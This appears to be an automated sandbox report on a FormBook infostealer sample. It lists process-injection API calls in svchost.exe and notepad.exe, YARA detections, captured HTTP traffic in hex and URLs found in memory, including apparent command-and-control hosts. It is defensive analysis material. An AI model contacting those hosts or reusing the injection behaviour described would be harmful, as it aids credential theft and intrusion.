3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 16:46:20 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound">
            Source: notepad.exe, 00000005.00000002.3885110150.0000000005B6A000.00000004.10000000.00040000.00000000.sdmp, notepad.exe, 00000005.00000002.3886877799.0000000007A00000.00000004.00000800.00020000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3884241981.000000000395A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://156.226.108.98:58888/
            Source: HAdkDWMZRiGMZe.exe, 00000006.00000002.3886044229.0000000005581000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bayarcepat19.click
            Source: HAdkDWMZRiGMZe.exe, 00000006.00000002.3886044229.0000000005581000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bayarcepat19.click/5hcm/
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: notepad.exe, 00000005.00000002.3885110150.00000000061B2000.00000004.10000000.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3884241981.0000000003FA2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
            Source: notepad.exe, 00000005.00000002.3882543699.0000000002E91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: notepad.exe, 00000005.00000002.3882543699.0000000002E91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: notepad.exe, 00000005.00000002.3882543699.0000000002E91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: notepad.exe, 00000005.00000002.3882543699.0000000002E91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: notepad.exe, 00000005.00000002.3882543699.0000000002E91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: notepad.exe, 00000005.00000002.3882543699.0000000002E91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: notepad.exe, 00000005.00000003.2526507791.0000000007D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: notepad.exe, 00000005.00000002.3885110150.00000000064D6000.00000004.10000000.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3884241981.00000000042C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bayarcepat19.click/5hcm/?gHCXmDU=tP3kAkfnE7i1YCC3akJDPtDOQtMjgFa5K3aSOloco8KmCG1xGxL66P/
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3886044229.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2343906085.0000000006650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3883738653.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2343594491.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3883798608.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3886044229.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2343906085.0000000006650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3883738653.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2343594491.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3883798608.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C753 NtClose,2_2_0042C753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A735C0 NtCreateMutant,LdrInitializeThunk,2_2_03A735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B60 NtClose,LdrInitializeThunk,2_2_03A72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03A72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74340 NtSetContextThread,2_2_03A74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73090 NtSetValueKey,2_2_03A73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73010 NtOpenDirectoryObject,2_2_03A73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74650 NtSuspendThread,2_2_03A74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BA0 NtEnumerateValueKey,2_2_03A72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B80 NtQueryInformationFile,2_2_03A72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BE0 NtQueryValueKey,2_2_03A72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BF0 NtAllocateVirtualMemory,2_2_03A72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AB0 NtWaitForSingleObject,2_2_03A72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AF0 NtWriteFile,2_2_03A72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AD0 NtReadFile,2_2_03A72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A739B0 NtGetContextThread,2_2_03A739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FA0 NtQuerySection,2_2_03A72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FB0 NtResumeThread,2_2_03A72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F90 NtProtectVirtualMemory,2_2_03A72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FE0 NtCreateFile,2_2_03A72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F30 NtCreateSection,2_2_03A72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F60 NtCreateProcessEx,2_2_03A72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EA0 NtAdjustPrivilegesToken,2_2_03A72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E80 NtReadVirtualMemory,2_2_03A72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EE0 NtQueueApcThread,2_2_03A72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E30 NtWriteVirtualMemory,2_2_03A72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DB0 NtEnumerateKey,2_2_03A72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DD0 NtDelayExecution,2_2_03A72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D30 NtUnmapViewOfSection,2_2_03A72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D00 NtSetInformationFile,2_2_03A72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D10 NtMapViewOfSection,2_2_03A72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D10 NtOpenProcessToken,2_2_03A73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D70 NtOpenThread,2_2_03A73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CA0 NtQueryInformationToken,2_2_03A72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CF0 NtOpenProcess,2_2_03A72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CC0 NtQueryVirtualMemory,2_2_03A72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C00 NtQueryInformationProcess,2_2_03A72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C60 NtCreateKey,2_2_03A72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C70 NtFreeVirtualMemory,2_2_03A72C70
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D135C0 NtCreateMutant,LdrInitializeThunk,5_2_04D135C0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D14650 NtSuspendThread,LdrInitializeThunk,5_2_04D14650
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D14340 NtSetContextThread,LdrInitializeThunk,5_2_04D14340
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_04D12CA0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04D12C70
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12C60 NtCreateKey,LdrInitializeThunk,5_2_04D12C60
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12DD0 NtDelayExecution,LdrInitializeThunk,5_2_04D12DD0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_04D12DF0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12D10 NtMapViewOfSection,LdrInitializeThunk,5_2_04D12D10
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_04D12D30
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12EE0 NtQueueApcThread,LdrInitializeThunk,5_2_04D12EE0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_04D12E80
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12FE0 NtCreateFile,LdrInitializeThunk,5_2_04D12FE0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12FB0 NtResumeThread,LdrInitializeThunk,5_2_04D12FB0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12F30 NtCreateSection,LdrInitializeThunk,5_2_04D12F30
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D139B0 NtGetContextThread,LdrInitializeThunk,5_2_04D139B0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12AD0 NtReadFile,LdrInitializeThunk,5_2_04D12AD0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12AF0 NtWriteFile,LdrInitializeThunk,5_2_04D12AF0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04D12BF0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12BE0 NtQueryValueKey,LdrInitializeThunk,5_2_04D12BE0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_04D12BA0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12B60 NtClose,LdrInitializeThunk,5_2_04D12B60
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D13090 NtSetValueKey,5_2_04D13090
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D13010 NtOpenDirectoryObject,5_2_04D13010
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12CC0 NtQueryVirtualMemory,5_2_04D12CC0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12CF0 NtOpenProcess,5_2_04D12CF0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12C00 NtQueryInformationProcess,5_2_04D12C00
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12DB0 NtEnumerateKey,5_2_04D12DB0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D13D70 NtOpenThread,5_2_04D13D70
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D13D10 NtOpenProcessToken,5_2_04D13D10
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12D00 NtSetInformationFile,5_2_04D12D00
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12EA0 NtAdjustPrivilegesToken,5_2_04D12EA0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12E30 NtWriteVirtualMemory,5_2_04D12E30
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12F90 NtProtectVirtualMemory,5_2_04D12F90
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12FA0 NtQuerySection,5_2_04D12FA0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12F60 NtCreateProcessEx,5_2_04D12F60
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12AB0 NtWaitForSingleObject,5_2_04D12AB0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12B80 NtQueryInformationFile,5_2_04D12B80
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02BA9270 NtDeleteFile,5_2_02BA9270
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02BA9320 NtClose,5_2_02BA9320
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02BA9000 NtCreateFile,5_2_02BA9000
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02BA9170 NtReadFile,5_2_02BA9170
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02BA9480 NtAllocateVirtualMemory,5_2_02BA9480
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004186E32_2_004186E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004020732_2_00402073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168D32_2_004168D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101732_2_00410173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031C02_2_004031C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1F32_2_0040E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D0A2_2_00402D0A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D102_2_00402D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042ED832_2_0042ED83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026202_2_00402620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF532_2_0040FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A8739A2_2_03A8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F02_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B003E62_2_03B003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF132D2_2_03AF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D34C2_2_03A2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA3522_2_03AFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A02_2_03A452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C02_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE02742_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4B1B02_2_03A4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B001AA2_2_03B001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF81CC2_2_03AF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A301002_2_03A30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA1182_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7516C2_2_03A7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F1722_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0B16B2_2_03B0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC81582_2_03AC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF70E92_2_03AF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF0E02_2_03AFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF0CC2_2_03AEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C02_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF7B02_2_03AFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3C7C02_2_03A3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A407702_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A647502_2_03A64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5C6E02_2_03A5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF16CC2_2_03AF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADD5B02_2_03ADD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B005912_2_03B00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A405352_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF75712_2_03AF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEE4F62_2_03AEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF43F2_2_03AFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A314602_2_03A31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF24462_2_03AF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FB802_2_03A5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB5BF02_2_03AB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7DBF92_2_03A7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF6BD72_2_03AF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFB762_2_03AFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFAB402_2_03AFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADDAAC2_2_03ADDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A85AA02_2_03A85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA802_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEDAC62_2_03AEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB3A6C2_2_03AB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFA492_2_03AFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7A462_2_03AF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A02_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0A9A62_2_03B0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A569622_2_03A56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A499502_2_03A49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B9502_2_03A5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A268B82_2_03A268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A438E02_2_03A438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E8F02_2_03A6E8F0
